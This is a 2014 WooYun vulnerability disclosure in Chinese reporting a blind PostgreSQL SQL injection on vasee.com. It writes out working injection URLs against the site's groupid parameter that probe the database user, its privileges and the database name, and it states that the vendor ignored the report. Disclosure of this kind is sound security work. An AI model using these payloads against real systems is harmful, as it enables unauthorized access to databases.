当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070432

漏洞标题:前沿官网postgresql注射一枚

相关厂商:北京前沿同创科技有限公司

漏洞作者: 路人甲

提交时间:2014-07-31 12:51

修复时间:2014-08-05 12:52

公开时间:2014-08-05 12:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-31: 细节已通知厂商并且等待厂商处理中
2014-08-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看到有人发的前沿的 敏感信息泄露上了首页,所以就看了下

详细说明:

上首页那个可能是 svn泄露源代码的
我这个是postgresql 注射
http://www.vasee.com/group/view/event/upcoming.jsp?groupid=ff808081355fdcb8013579b528870583' and length(user())=8 and 'a'='a
正常
说明用户长度为8
http://www.vasee.com/group/view/event/upcoming.jsp?groupid=ff808081355fdcb8013579b528870583' and user()='postgres' and'a'='a
正常
用户为postgre

QQ图片20140731111242.jpg


权限是 dba
http://www.vasee.com/group/view/event/upcoming.jsp?groupid=ff808081355fdcb8013579b528870583%27and%20current_database%28%29=
%27vaseedbstable%27%20and%20%27a%27=%27a
正常
当前数据库是vaseedbstable
因为这个点 不能用注释符 盲注比较累 所以就没继续了

漏洞证明:

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-08-05 12:52

厂商回复:

最新状态:

暂无


漏洞评价:

评论